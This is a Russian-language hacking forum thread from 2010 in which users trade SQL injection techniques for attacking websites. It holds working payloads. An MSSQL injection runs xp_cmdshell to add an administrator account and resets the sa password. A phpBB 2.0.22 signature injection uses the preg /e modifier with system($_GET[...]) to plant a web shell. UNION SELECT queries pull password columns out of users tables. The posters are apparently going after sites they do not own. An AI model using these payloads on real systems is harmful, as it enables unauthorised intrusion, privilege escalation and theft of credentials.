30.04.2010, 14:26
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
С нами:
8638130
Репутация:
54
|
|
в mssql если имя пользователя не sa при запросе:
http://test/news.asp?id=1+or+1=(select+system_user)--
то как я понимаю у меня не будет прав на выполнения команд?
|
|
|
30.04.2010, 14:52
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
С нами:
8866466
Репутация:
564
|
|
2pinch нет от этого не зависеть
если есть права то кмдшелл то добавь сам админа EXEC xp_cmdshell 'net localgroup Administrators test_user /add'
в твоем случае можешь поменять пароль от админа (ну если превелегии есть)
?id=1; UPDATE 'admin_login' SET 'password' = 'password' WHERE login_name='sa--
Последний раз редактировалось shell_c0de; 30.04.2010 в 14:56..
|
|
|
|
30.04.2010, 17:25
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
С нами:
9534473
Репутация:
18
|
|
Как в phpBB 2.0.22 обойти usercp_avatar.php ??
не получаеться залить шел через аватарку. видно стоит обработка скриптом!
Или что можно воткнут в место phpinfo()
в
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb  hpinfo()' WHERE user_id=4;
штоб шел залить??
Последний раз редактировалось GOGA075; 30.04.2010 в 18:17..
|
|
|
|
30.04.2010, 19:13
|
|
Участник форума
Регистрация: 26.07.2008
Сообщений: 267
С нами:
9364549
Репутация:
184
|
|
вставляй system($_GET[tu4ka])
|
|
|
|
30.04.2010, 22:19
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
есть таблица users
table_rows - 6
есть колонки name,pass
когда делаю запрос union+select+......version()+from+users то все нормально
а запрос union+select+......pass+from+users ничего не выдает
что посоветуете?
|
|
|
|
30.04.2010, 22:35
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
С нами:
9534473
Репутация:
18
|
|
Konqi, попробуй shar() либо concat_ws()
|
|
|
|
30.04.2010, 22:39
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от GOGA075
Konqi, попробуй shar() либо concat_ws()
чаром нельзя,а конкат не че не может изменить ибо это функция для соединения результатов,не больше.
|
|
|
|
30.04.2010, 22:36
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
Konqi проверь если не пустая табла
union+select+1,2,count(*),4+from+users
count(*) выводит количество записей в таблице, если вывело 0, таблица пустая
либо для 5 ветки так
union+select+1,table_rows+from+information_schema. tables+where+table_name='users'
и если табла в нужной базe
union+select+1,2,pass,4+from+database_name.users
hex(unhex())
aes_encrypt....
GOGA075
concat обьеденяет запросы..причем тут конкатирование?
Последний раз редактировалось Gorev; 30.04.2010 в 22:40..
|
|
|
|
30.04.2010, 22:41
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от Gorev
Konqi проверь если не пустая табла
union+select+1,2,count(*),4+from+users
count(*) выводит количество записей в таблице, если вывело 0, таблица пустая
либо для 5 ветки так
union+select+1,table_rows+from+information_schema. tables+where+table_name='users'
и если табла в нужной базe
union+select+1,2,pass,4+from+database_name.users
hex(unhex())
aes_encrypt....
GOGA075
concat обьеденяет запросы..причем тут конкатирование?
count(*) выдает 4
|
|
|
|
30.04.2010, 22:45
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
С нами:
8603287
Репутация:
87
|
|
Сообщение от Konqi
count(*) выдает 4
узнай в какой базе таблица users... потом from+*base*.users
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?2114843){kind=avatar}
Похожие темы
Комбинированный вид
